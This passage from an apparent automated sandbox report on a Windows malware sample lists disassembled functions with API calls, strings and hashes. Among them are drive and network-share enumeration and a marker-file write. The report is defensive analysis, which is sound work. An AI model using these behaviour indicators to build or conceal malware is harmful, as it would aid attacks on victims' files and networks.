                                                                                                                                        • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                                                                                                                        • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                                                        • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004253AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __lock.LIBCMT ref: 0042594A
                                                                                                                                          • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                                                          • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                                                          • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                                                        • _free.LIBCMT ref: 00425970
                                                                                                                                          • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                                                          • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                                                        • __lock.LIBCMT ref: 00425989
                                                                                                                                        • ___removelocaleref.LIBCMT ref: 00425998
                                                                                                                                        • ___freetlocinfo.LIBCMT ref: 004259B1
                                                                                                                                        • _free.LIBCMT ref: 004259C4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 626533743-0
                                                                                                                                        • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                                                        • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                                                                                                                        • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                                                        • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                                        • API String ID: 601868998-2416195885
                                                                                                                                        • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                                                        • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                                                                        • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                                                        • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                                                                        • API String ID: 2102423945-3653307630
                                                                                                                                        • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                                                        • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                                                                        • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                                                        • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004C5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                                                                          • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                                                                                                                          • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                                                                          • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                                                                          • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                                                                          • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                                                                                                                        • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                                                                        Strings
                                                                                                                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                        • API String ID: 3123740607-798102604
                                                                                                                                        • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                        • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                                                                        • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                        • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _fprintf_memset
                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                                        • API String ID: 3021507156-3399676524
                                                                                                                                        • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                                                        • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                                                                        • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                                                        • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                        • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                                                        • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                                                                        • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                                                        • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                                                        • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                                                        • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                        • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                                                                        • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                        • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                                                                        • _memset.LIBCMT ref: 00410C4C
                                                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 364255426-0
                                                                                                                                        • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                                                        • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                                                                        • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                                                        • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004416EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00441726
                                                                                                                                        • _strlen.LIBCMT ref: 00441734
                                                                                                                                          • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                        • _strnlen.LIBCMT ref: 004417BF
                                                                                                                                        • __lock.LIBCMT ref: 004417D0
                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2168648987-0
                                                                                                                                        • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                        • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                                                                        • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                        • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2560635915-0
                                                                                                                                        • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                                                        • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                                                                        • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                                                        • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 0043B70B
                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                        • _free.LIBCMT ref: 0043B71E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1020059152-0
                                                                                                                                        • Opcode ID: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
                                                                                                                                        • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                                                                        • Opcode Fuzzy Hash: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
                                                                                                                                        • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041F0B6
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                        • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                        • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                                                                        • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                        • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041E546
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                        • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                        • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                                                                        • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                        • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041FA7B
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                        • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                        • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                                                                        • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                        • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041FE2B
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                        • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                                                        • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                                                                        • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
